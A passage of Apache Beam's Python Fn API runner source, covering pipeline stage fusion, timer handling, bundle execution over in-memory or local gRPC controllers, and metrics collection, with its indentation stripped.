for pcoll_id in transform.outputs.values():
length_prefix_unknown_coders(
pipeline_components.pcollections[pcoll_id], pipeline_components)
# This is used later to correlate the read and write.
grouping_buffer = create_buffer_id(stage.name, kind='group')
if stage.name not in pipeline_components.transforms:
pipeline_components.transforms[stage.name].CopyFrom(transform)
gbk_write = Stage(
transform.unique_name + '/Write',
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Write',
inputs=transform.inputs,
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=grouping_buffer))],
downstream_side_inputs=frozenset(),
must_follow=stage.must_follow)
yield gbk_write
yield Stage(
transform.unique_name + '/Read',
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Read',
outputs=transform.outputs,
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=grouping_buffer))],
downstream_side_inputs=stage.downstream_side_inputs,
must_follow=union(frozenset([gbk_write]), stage.must_follow))
else:
yield stage
def sink_flattens(stages):
"""Sink flattens and remove them from the graph.
A flatten that cannot be sunk/fused away becomes multiple writes (to the
same logical sink) followed by a read.
"""
# TODO(robertwb): Actually attempt to sink rather than always materialize.
# TODO(robertwb): Possibly fuse this into one of the stages.
pcollections = pipeline_components.pcollections
for stage in stages:
assert len(stage.transforms) == 1
transform = stage.transforms[0]
if transform.spec.urn == common_urns.primitives.FLATTEN.urn:
# This is used later to correlate the read and writes.
buffer_id = create_buffer_id(transform.unique_name)
output_pcoll_id, = list(transform.outputs.values())
output_coder_id = pcollections[output_pcoll_id].coder_id
flatten_writes = []
for local_in, pcoll_in in transform.inputs.items():
if pcollections[pcoll_in].coder_id != output_coder_id:
# Flatten inputs must all be written with the same coder as is
# used to read them.
pcollections[pcoll_in].coder_id = output_coder_id
transcoded_pcollection = (
transform.unique_name + '/Transcode/' + local_in + '/out')
yield Stage(
transform.unique_name + '/Transcode/' + local_in,
[beam_runner_api_pb2.PTransform(
unique_name=
transform.unique_name + '/Transcode/' + local_in,
inputs={local_in: pcoll_in},
outputs={'out': transcoded_pcollection},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.IDENTITY_DOFN_URN))],
downstream_side_inputs=frozenset(),
must_follow=stage.must_follow)
pcollections[transcoded_pcollection].CopyFrom(
pcollections[pcoll_in])
pcollections[transcoded_pcollection].coder_id = output_coder_id
else:
transcoded_pcollection = pcoll_in
flatten_write = Stage(
transform.unique_name + '/Write/' + local_in,
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Write/' + local_in,
inputs={local_in: transcoded_pcollection},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=buffer_id))],
downstream_side_inputs=frozenset(),
must_follow=stage.must_follow)
flatten_writes.append(flatten_write)
yield flatten_write
yield Stage(
transform.unique_name + '/Read',
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Read',
outputs=transform.outputs,
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=buffer_id))],
downstream_side_inputs=stage.downstream_side_inputs,
must_follow=union(frozenset(flatten_writes), stage.must_follow))
else:
yield stage
def annotate_downstream_side_inputs(stages):
"""Annotate each stage with fusion-prohibiting information.
Each stage is annotated with the (transitive) set of pcollections that
depend on this stage that are also used later in the pipeline as a
side input.
While theoretically this could result in O(n^2) annotations, the size of
each set is bounded by the number of side inputs (typically much smaller
than the number of total nodes) and the number of *distinct* side-input
sets is also generally small (and shared due to the use of union
defined above).
This representation is also amenable to simple recomputation on fusion.
"""
consumers = collections.defaultdict(list)
all_side_inputs = set()
for stage in stages:
for transform in stage.transforms:
for input in transform.inputs.values():
consumers[input].append(stage)
for si in stage.side_inputs():
all_side_inputs.add(si)
all_side_inputs = frozenset(all_side_inputs)
downstream_side_inputs_by_stage = {}
def compute_downstream_side_inputs(stage):
if stage not in downstream_side_inputs_by_stage:
downstream_side_inputs = frozenset()
for transform in stage.transforms:
for output in transform.outputs.values():
if output in all_side_inputs:
downstream_side_inputs = union(
downstream_side_inputs, frozenset([output]))
for consumer in consumers[output]:
downstream_side_inputs = union(
downstream_side_inputs,
compute_downstream_side_inputs(consumer))
downstream_side_inputs_by_stage[stage] = downstream_side_inputs
return downstream_side_inputs_by_stage[stage]
for stage in stages:
stage.downstream_side_inputs = compute_downstream_side_inputs(stage)
return stages
def fix_side_input_pcoll_coders(stages):
"""Length prefix side input PCollection coders.
"""
for stage in stages:
for si in stage.side_inputs():
length_prefix_unknown_coders(
pipeline_components.pcollections[si], pipeline_components)
return stages
def greedily_fuse(stages):
"""Places transforms sharing an edge in the same stage, whenever possible.
"""
producers_by_pcoll = {}
consumers_by_pcoll = collections.defaultdict(list)
# Used to always reference the correct stage as the producer and
# consumer maps are not updated when stages are fused away.
replacements = {}
def replacement(s):
old_ss = []
while s in replacements:
old_ss.append(s)
s = replacements[s]
for old_s in old_ss[:-1]:
replacements[old_s] = s
return s
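      # (Added note) replacement() is essentially union-find's "find with
      # path compression" over the replacements forest: after fusing a
      # into b and b into c, replacement(a) returns c and rewrites the
      # intermediate links so later lookups take a single hop.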
def fuse(producer, consumer):
fused = producer.fuse(consumer)
replacements[producer] = fused
replacements[consumer] = fused
# First record the producers and consumers of each PCollection.
for stage in stages:
for transform in stage.transforms:
for input in transform.inputs.values():
consumers_by_pcoll[input].append(stage)
for output in transform.outputs.values():
producers_by_pcoll[output] = stage
logging.debug('consumers\n%s', consumers_by_pcoll)
logging.debug('producers\n%s', producers_by_pcoll)
# Now try to fuse away all pcollections.
for pcoll, producer in producers_by_pcoll.items():
write_pcoll = None
for consumer in consumers_by_pcoll[pcoll]:
producer = replacement(producer)
consumer = replacement(consumer)
# Update consumer.must_follow set, as it's used in can_fuse.
consumer.must_follow = frozenset(
replacement(s) for s in consumer.must_follow)
if producer.can_fuse(consumer):
fuse(producer, consumer)
else:
# If we can't fuse, do a read + write.
buffer_id = create_buffer_id(pcoll)
if write_pcoll is None:
write_pcoll = Stage(
pcoll + '/Write',
[beam_runner_api_pb2.PTransform(
unique_name=pcoll + '/Write',
inputs={'in': pcoll},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=buffer_id))])
fuse(producer, write_pcoll)
if consumer.has_as_main_input(pcoll):
read_pcoll = Stage(
pcoll + '/Read',
[beam_runner_api_pb2.PTransform(
unique_name=pcoll + '/Read',
outputs={'out': pcoll},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=buffer_id))],
must_follow=frozenset([write_pcoll]))
fuse(read_pcoll, consumer)
else:
consumer.must_follow = union(
consumer.must_follow, frozenset([write_pcoll]))
# Everything that was originally a stage or a replacement, but wasn't
# replaced, should be in the final graph.
final_stages = frozenset(stages).union(list(replacements.values()))\
.difference(list(replacements))
for stage in final_stages:
# Update all references to their final values before throwing
# the replacement data away.
stage.must_follow = frozenset(replacement(s) for s in stage.must_follow)
        # Fusion may have produced multiple reads of the same stage;
        # drop the duplicates.
stage.deduplicate_read()
return final_stages
def inject_timer_pcollections(stages):
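      """(Added doc sketch) Creates timer read/write PCollections.
      For each ParDo with timer specs, wires a data-plane read and write
      PCollection per timer tag into the stage, so run_stage below can
      loop, feeding fired timers back into the bundle until none remain.
      """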
for stage in stages:
for transform in list(stage.transforms):
if transform.spec.urn == common_urns.primitives.PAR_DO.urn:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, spec in payload.timer_specs.items():
if len(transform.inputs) > 1:
raise NotImplementedError('Timers and side inputs.')
input_pcoll = pipeline_components.pcollections[
next(iter(transform.inputs.values()))]
# Create the appropriate coder for the timer PCollection.
key_coder_id = input_pcoll.coder_id
if (pipeline_components.coders[key_coder_id].spec.spec.urn
== common_urns.coders.WINDOWED_VALUE.urn):
key_coder_id = pipeline_components.coders[
key_coder_id].component_coder_ids[0]
if (pipeline_components.coders[key_coder_id].spec.spec.urn
== common_urns.coders.KV.urn):
key_coder_id = pipeline_components.coders[
key_coder_id].component_coder_ids[0]
key_timer_coder_id = add_or_get_coder_id(
beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.SdkFunctionSpec(
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.coders.KV.urn)),
component_coder_ids=[key_coder_id, spec.timer_coder_id]))
timer_pcoll_coder_id = windowed_coder_id(
key_timer_coder_id,
pipeline_components.windowing_strategies[
input_pcoll.windowing_strategy_id].window_coder_id)
# Inject the read and write pcollections.
timer_read_pcoll = unique_name(
pipeline_components.pcollections,
'%s_timers_to_read_%s' % (transform.unique_name, tag))
timer_write_pcoll = unique_name(
pipeline_components.pcollections,
'%s_timers_to_write_%s' % (transform.unique_name, tag))
pipeline_components.pcollections[timer_read_pcoll].CopyFrom(
beam_runner_api_pb2.PCollection(
unique_name=timer_read_pcoll,
coder_id=timer_pcoll_coder_id,
windowing_strategy_id=input_pcoll.windowing_strategy_id,
is_bounded=input_pcoll.is_bounded))
pipeline_components.pcollections[timer_write_pcoll].CopyFrom(
beam_runner_api_pb2.PCollection(
unique_name=timer_write_pcoll,
coder_id=timer_pcoll_coder_id,
windowing_strategy_id=input_pcoll.windowing_strategy_id,
is_bounded=input_pcoll.is_bounded))
stage.transforms.append(
beam_runner_api_pb2.PTransform(
unique_name=timer_read_pcoll + '/Read',
outputs={'out': timer_read_pcoll},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=create_buffer_id(
timer_read_pcoll, kind='timers'))))
stage.transforms.append(
beam_runner_api_pb2.PTransform(
unique_name=timer_write_pcoll + '/Write',
inputs={'in': timer_write_pcoll},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=create_buffer_id(
timer_write_pcoll, kind='timers'))))
assert tag not in transform.inputs
transform.inputs[tag] = timer_read_pcoll
assert tag not in transform.outputs
transform.outputs[tag] = timer_write_pcoll
stage.timer_pcollections.append(
(timer_read_pcoll + '/Read', timer_write_pcoll))
yield stage
def sort_stages(stages):
"""Order stages suitable for sequential execution.
"""
seen = set()
ordered = []
def process(stage):
if stage not in seen:
seen.add(stage)
for prev in stage.must_follow:
process(prev)
ordered.append(stage)
for stage in stages:
process(stage)
return ordered
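    # (Added note) process() above is a depth-first topological sort over
    # the must_follow relation; it assumes that relation is acyclic, which
    # the preceding phases are expected to preserve.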
# Now actually apply the operations.
pipeline_components = copy.deepcopy(pipeline_proto.components)
# Some SDK workers require windowed coders for their PCollections.
# TODO(BEAM-4150): Consistently use unwindowed coders everywhere.
for pcoll in pipeline_components.pcollections.values():
if (pipeline_components.coders[pcoll.coder_id].spec.spec.urn
!= common_urns.coders.WINDOWED_VALUE.urn):
pcoll.coder_id = windowed_coder_id(
pcoll.coder_id,
pipeline_components.windowing_strategies[
pcoll.windowing_strategy_id].window_coder_id)
known_composites = set(
[common_urns.primitives.GROUP_BY_KEY.urn,
common_urns.composites.COMBINE_PER_KEY.urn])
def leaf_transforms(root_ids):
for root_id in root_ids:
root = pipeline_proto.components.transforms[root_id]
if root.spec.urn in known_composites:
yield root_id
elif not root.subtransforms:
# Make sure its outputs are not a subset of its inputs.
if set(root.outputs.values()) - set(root.inputs.values()):
yield root_id
else:
for leaf in leaf_transforms(root.subtransforms):
yield leaf
# Initial set of stages are singleton leaf transforms.
stages = [
Stage(name, [pipeline_proto.components.transforms[name]])
for name in leaf_transforms(pipeline_proto.root_transform_ids)]
# Apply each phase in order.
for phase in [
annotate_downstream_side_inputs, fix_side_input_pcoll_coders,
lift_combiners, expand_gbk, sink_flattens, greedily_fuse,
impulse_to_input, inject_timer_pcollections, sort_stages]:
logging.info('%s %s %s', '=' * 20, phase, '=' * 20)
stages = list(phase(stages))
logging.debug('Stages: %s', [str(s) for s in stages])
# Return the (possibly mutated) context and ordered set of stages.
return pipeline_components, stages, safe_coders
def run_stages(self, pipeline_components, stages, safe_coders):
if self._use_grpc:
controller = FnApiRunner.GrpcController(self._sdk_harness_factory)
else:
controller = FnApiRunner.DirectController()
metrics_by_stage = {}
monitoring_infos_by_stage = {}
try:
with self.maybe_profile():
pcoll_buffers = collections.defaultdict(list)
for stage in stages:
stage_results = self.run_stage(
controller, pipeline_components, stage,
pcoll_buffers, safe_coders)
metrics_by_stage[stage.name] = stage_results.process_bundle.metrics
monitoring_infos_by_stage[stage.name] = (
stage_results.process_bundle.monitoring_infos)
finally:
controller.close()
return RunnerResult(
runner.PipelineState.DONE, monitoring_infos_by_stage, metrics_by_stage)
def run_stage(
self, controller, pipeline_components, stage, pcoll_buffers, safe_coders):
context = pipeline_context.PipelineContext(pipeline_components)
data_api_service_descriptor = controller.data_api_service_descriptor()
def extract_endpoints(stage):
# Returns maps of transform names to PCollection identifiers.
# Also mutates IO stages to point to the data ApiServiceDescriptor.
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
target = transform.unique_name, only_element(transform.outputs)
if pcoll_id == IMPULSE_BUFFER:
data_input[target] = [ENCODED_IMPULSE_VALUE]
else:
data_input[target] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
target = transform.unique_name, only_element(transform.inputs)
data_output[target] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn == common_urns.primitives.PAR_DO.urn:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]),
beam.pvalue.SideInputData.from_runner_api(si, context))
return data_input, data_side_input, data_output
logging.info('Running %s', stage.name)
logging.debug(' %s', stage)
data_input, data_side_input, data_output = extract_endpoints(stage)
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms={transform.unique_name: transform
for transform in stage.transforms},
pcollections=dict(pipeline_components.pcollections.items()),
coders=dict(pipeline_components.coders.items()),
windowing_strategies=dict(
pipeline_components.windowing_strategies.items()),
environments=dict(pipeline_components.environments.items()))
if controller.state_api_service_descriptor():
process_bundle_descriptor.state_api_service_descriptor.url = (
controller.state_api_service_descriptor().url)
# Store the required side inputs into state.
for (transform_id, tag), (buffer_id, si) in data_side_input.items():
_, pcoll_id = split_buffer_id(buffer_id)
value_coder = context.coders[safe_coders[
pipeline_components.pcollections[pcoll_id].coder_id]]
elements_by_window = _WindowGroupingBuffer(si, value_coder)
for element_data in pcoll_buffers[buffer_id]:
elements_by_window.append(element_data)
for key, window, elements_data in elements_by_window.encoded_items():
state_key = beam_fn_api_pb2.StateKey(
multimap_side_input=beam_fn_api_pb2.StateKey.MultimapSideInput(
ptransform_id=transform_id,
side_input_id=tag,
window=window,
key=key))
controller.state_handler.blocking_append(state_key, elements_data)
def get_buffer(buffer_id):
kind, name = split_buffer_id(buffer_id)
if kind in ('materialize', 'timers'):
if buffer_id not in pcoll_buffers:
# Just store the data chunks for replay.
pcoll_buffers[buffer_id] = list()
elif kind == 'group':
# This is a grouping write, create a grouping buffer if needed.
if buffer_id not in pcoll_buffers:
original_gbk_transform = name
transform_proto = pipeline_components.transforms[
original_gbk_transform]
input_pcoll = only_element(list(transform_proto.inputs.values()))
output_pcoll = only_element(list(transform_proto.outputs.values()))
pre_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[input_pcoll].coder_id]]
post_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[output_pcoll].coder_id]]
windowing_strategy = context.windowing_strategies[
pipeline_components
.pcollections[output_pcoll].windowing_strategy_id]
pcoll_buffers[buffer_id] = _GroupingBuffer(
pre_gbk_coder, post_gbk_coder, windowing_strategy)
else:
        # These should be the only buffer kinds produced for now,
        # but special side input writes may go here.
raise NotImplementedError(buffer_id)
return pcoll_buffers[buffer_id]
for k in range(self._bundle_repeat):
try:
controller.state_handler.checkpoint()
BundleManager(
controller, lambda pcoll_id: [], process_bundle_descriptor,
self._progress_frequency, k).process_bundle(data_input, data_output)
finally:
controller.state_handler.restore()
result = BundleManager(
controller, get_buffer, process_bundle_descriptor,
self._progress_frequency).process_bundle(data_input, data_output)
while True:
timer_inputs = {}
for transform_id, timer_writes in stage.timer_pcollections:
windowed_timer_coder_impl = context.coders[
pipeline_components.pcollections[timer_writes].coder_id].get_impl()
written_timers = get_buffer(
create_buffer_id(timer_writes, kind='timers'))
if written_timers:
# Keep only the "last" timer set per key and window.
timers_by_key_and_window = {}
for elements_data in written_timers:
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_key_timer = windowed_timer_coder_impl.decode_from_stream(
input_stream, True)
key, _ = windowed_key_timer.value
# TODO: Explode and merge windows.
assert len(windowed_key_timer.windows) == 1
timers_by_key_and_window[
key, windowed_key_timer.windows[0]] = windowed_key_timer
out = create_OutputStream()
for windowed_key_timer in timers_by_key_and_window.values():
windowed_timer_coder_impl.encode_to_stream(
windowed_key_timer, out, True)
timer_inputs[transform_id, 'out'] = [out.get()]
written_timers[:] = []
if timer_inputs:
# The worker will be waiting on these inputs as well.
for other_input in data_input:
if other_input not in timer_inputs:
timer_inputs[other_input] = []
# TODO(robertwb): merge results
BundleManager(
controller,
get_buffer,
process_bundle_descriptor,
self._progress_frequency,
True).process_bundle(timer_inputs, data_output)
else:
break
return result
# These classes are used to interact with the worker.
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
class CopyOnWriteState(object):
def __init__(self, underlying):
self._underlying = underlying
self._overlay = {}
def __getitem__(self, key):
if key in self._overlay:
return self._overlay[key]
else:
return FnApiRunner.StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
self._overlay[key] = []
def commit(self):
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self, underlying, overlay, key):
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
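    # (Added note) Together, CopyOnWriteState and CopyOnWriteList give
    # checkpoint() a cheap snapshot: reads fall through to the underlying
    # dict until a key is first mutated, at which point only that key's
    # list is copied into the overlay; commit() folds the overlay back,
    # and restore() simply discards it.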
def __init__(self):
self._lock = threading.Lock()
self._state = collections.defaultdict(list)
self._checkpoint = None
def checkpoint(self):
assert self._checkpoint is None
self._checkpoint = self._state
self._state = FnApiRunner.StateServicer.CopyOnWriteState(self._state)
def commit(self):
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
self._state = self._checkpoint
self._checkpoint = None
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
yield
def blocking_get(self, state_key):
with self._lock:
return b''.join(self._state[self._to_key(state_key)])
def blocking_append(self, state_key, data):
with self._lock:
self._state[self._to_key(state_key)].append(data)
def blocking_clear(self, state_key):
with self._lock:
del self._state[self._to_key(state_key)]
@staticmethod
def _to_key(state_key):
return state_key.SerializeToString()
class GrpcStateServicer(
StateServicer, beam_fn_api_pb2_grpc.BeamFnStateServicer):
def State(self, request_stream, context=None):
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_reference.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=self.blocking_get(request.state_key)))
elif request_type == 'append':
self.blocking_append(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self.blocking_clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
"""Does nothing."""
pass
class DirectController(object):
"""An in-memory controller for fn API control, state and data planes."""
def __init__(self):
self.control_handler = self
self.data_plane_handler = data_plane.InMemoryDataChannel()
self.state_handler = FnApiRunner.StateServicer()
self.worker = sdk_worker.SdkWorker(
FnApiRunner.SingletonStateHandlerFactory(self.state_handler),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()), {})
self._uid_counter = 0
def push(self, request):
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
logging.debug('CONTROL REQUEST %s', request)
response = self.worker.do_instruction(request)
logging.debug('CONTROL RESPONSE %s', response)
return ControlFuture(request.instruction_id, response)
def done(self):
pass
def close(self):
pass
def data_api_service_descriptor(self):
return None
def state_api_service_descriptor(self):
return None
class GrpcController(object):
"""An grpc based controller for fn API control, state and data planes."""
def __init__(self, sdk_harness_factory=None):
self.sdk_harness_factory = sdk_harness_factory
self.control_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10))
self.control_port = self.control_server.add_insecure_port('[::]:0')
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10),
options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10),
options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer()
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
self.data_plane_handler = data_plane.GrpcServerDataChannel()
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
self.state_handler = FnApiRunner.GrpcStateServicer()
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
self.state_handler, self.state_server)
logging.info('starting control server on port %s', self.control_port)
logging.info('starting data server on port %s', self.data_port)
self.state_server.start()
self.data_server.start()
self.control_server.start()
self.worker = self.sdk_harness_factory(
'localhost:%s' % self.control_port
) if self.sdk_harness_factory else sdk_worker.SdkHarness(
'localhost:%s' % self.control_port, worker_count=1)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
logging.info('starting worker')
self.worker_thread.start()
def data_api_service_descriptor(self):
url = 'localhost:%s' % self.data_port
api_service_descriptor = endpoints_pb2.ApiServiceDescriptor()
api_service_descriptor.url = url
return api_service_descriptor
def state_api_service_descriptor(self):
url = 'localhost:%s' % self.state_port
api_service_descriptor = endpoints_pb2.ApiServiceDescriptor()
api_service_descriptor.url = url
return api_service_descriptor
def close(self):
self.control_handler.done()
self.worker_thread.join()
self.data_plane_handler.close()
self.control_server.stop(5).wait()
self.data_server.stop(5).wait()
self.state_server.stop(5).wait()
class BundleManager(object):
_uid_counter = 0
def __init__(
self, controller, get_buffer, bundle_descriptor, progress_frequency=None,
skip_registration=False):
self._controller = controller
self._get_buffer = get_buffer
self._bundle_descriptor = bundle_descriptor
self._registered = skip_registration
self._progress_frequency = progress_frequency
def process_bundle(self, inputs, expected_outputs):
# Unique id for the instruction processing this bundle.
BundleManager._uid_counter += 1
process_bundle_id = 'bundle_%s' % BundleManager._uid_counter
# Register the bundle descriptor, if needed.
if not self._registered:
process_bundle_registration = beam_fn_api_pb2.InstructionRequest(
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[self._bundle_descriptor]))
self._controller.control_handler.push(process_bundle_registration)
self._registered = True
# Write all the input data to the channel.
for (transform_id, name), elements in inputs.items():
data_out = self._controller.data_plane_handler.output_stream(
process_bundle_id, beam_fn_api_pb2.Target(
primitive_transform_reference=transform_id, name=name))
for element_data in elements:
data_out.write(element_data)
data_out.close()
# Actually start the bundle.
process_bundle = beam_fn_api_pb2.InstructionRequest(
instruction_id=process_bundle_id,
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_reference=self._bundle_descriptor.id))
result_future = self._controller.control_handler.push(process_bundle)
with ProgressRequester(
self._controller, process_bundle_id, self._progress_frequency):
# Gather all output data.
expected_targets = [
beam_fn_api_pb2.Target(primitive_transform_reference=transform_id,
name=output_name)
for (transform_id, output_name), _ in expected_outputs.items()]
logging.debug('Gather all output data from %s.', expected_targets)
for output in self._controller.data_plane_handler.input_elements(
process_bundle_id, expected_targets):
target_tuple = (
output.target.primitive_transform_reference, output.target.name)
if target_tuple in expected_outputs:
self._get_buffer(expected_outputs[target_tuple]).append(output.data)
logging.debug('Wait for the bundle to finish.')
result = result_future.get()
if result.error:
raise RuntimeError(result.error)
return result
class ProgressRequester(threading.Thread):
def __init__(self, controller, instruction_id, frequency, callback=None):
super(ProgressRequester, self).__init__()
self._controller = controller
self._instruction_id = instruction_id
self._frequency = frequency
self._done = False
self._latest_progress = None
self._callback = callback
self.daemon = True
def __enter__(self):
if self._frequency:
self.start()
def __exit__(self, *unused_exc_info):
if self._frequency:
self.stop()
def run(self):
while not self._done:
try:
progress_result = self._controller.control_handler.push(
beam_fn_api_pb2.InstructionRequest(
process_bundle_progress=
beam_fn_api_pb2.ProcessBundleProgressRequest(
instruction_reference=self._instruction_id))).get()
self._latest_progress = progress_result.process_bundle_progress
if self._callback:
self._callback(self._latest_progress)
except Exception as exn:
logging.error("Bad progress: %s", exn)
time.sleep(self._frequency)
def stop(self):
self._done = True
class ControlFuture(object):
def __init__(self, instruction_id, response=None):
self.instruction_id = instruction_id
if response:
self._response = response
else:
self._response = None
self._condition = threading.Condition()
def set(self, response):
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
if not self._response:
with self._condition:
if not self._response:
self._condition.wait(timeout)
return self._response
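  # (Added note) get() follows the double-checked pattern: the unlocked
  # fast path covers responses set before the call; otherwise it re-checks
  # under the condition and waits until set() calls notify_all().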
class FnApiMetrics(metrics.metric.MetricResults):
def __init__(self, step_monitoring_infos, user_metrics_only=True):
"""Used for querying metrics from the PipelineResult object.
step_monitoring_infos: Per step metrics specified as MonitoringInfos.
use_monitoring_infos: If true, return the metrics based on the
step_monitoring_infos.
"""
self._counters = {}
self._distributions = {}
self._gauges = {}
self._user_metrics_only = user_metrics_only
self._init_metrics_from_monitoring_infos(step_monitoring_infos)
def _init_metrics_from_monitoring_infos(self, step_monitoring_infos):
for smi in step_monitoring_infos.values():
# Only include user metrics.
for mi in smi:
if (self._user_metrics_only and
not monitoring_infos.is_user_monitoring_info(mi)):
continue
key = self._to_metric_key(mi)
if monitoring_infos.is_counter(mi):
self._counters[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
elif monitoring_infos.is_distribution(mi):
self._distributions[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
elif monitoring_infos.is_gauge(mi):
self._gauges[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
def _to_metric_key(self, monitoring_info):
    # Right now this assumes that all metrics have a PTRANSFORM label.
ptransform_id = monitoring_info.labels['PTRANSFORM']
namespace, name = monitoring_infos.parse_namespace_and_name(monitoring_info)
return MetricKey(
ptransform_id, metrics.metricbase.MetricName(namespace, name))
def query(self, filter=None):
counters = [metrics.execution.MetricResult(k, v, v)
for k, v in self._counters.items()
if self.matches(filter, k)]
distributions = [metrics.execution.MetricResult(k, v, v)
for k, v in self._distributions.items()
if self.matches(filter, k)]
gauges = [metrics.execution.MetricResult(k, v, v)
for k, v in self._gauges.items()
if self.matches(filter, k)]
return {self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges}
class RunnerResult(runner.PipelineResult):
def __init__(self, state, monitoring_infos_by_stage, metrics_by_stage):
super(RunnerResult, self).__init__(state)
self._monitoring_infos_by_stage = monitoring_infos_by_stage
self._metrics_by_stage = metrics_by_stage
self._metrics = None
self._monitoring_metrics = None
def wait_until_finish(self, duration=None):
return self._state
def metrics(self):
"""Returns a queryable oject including user metrics only."""
if self._metrics is None:
self._metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=True)
return self._metrics
def monitoring_metrics(self):
"""Returns a queryable object including all metrics."""
if self._monitoring_metrics is None:
self._monitoring_metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=False)
return self._monitoring_metrics
def only_element(iterable):
element, = iterable
return element
def unique_name(existing, prefix):
if prefix in existing:
counter = 0
while True:
counter += 1
prefix_counter = prefix + "_%s" % counter
if prefix_counter not in existing:
return prefix_counter
else:
return prefix
def create_buffer_id(name, kind='materialize'):
return ('%s:%s' % (kind, name)).encode('utf-8')
def split_buffer_id(buffer_id):
return buffer_id.decode('utf-8').split(':', 1)
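# --- Added usage sketch (not part of the original module) ---
# The helpers above encode a (kind, name) pair into a bytes buffer id and
# split it back; unique_name appends a numeric suffix until the candidate
# is free. 'MyGBK' is a hypothetical stage name used only for illustration.
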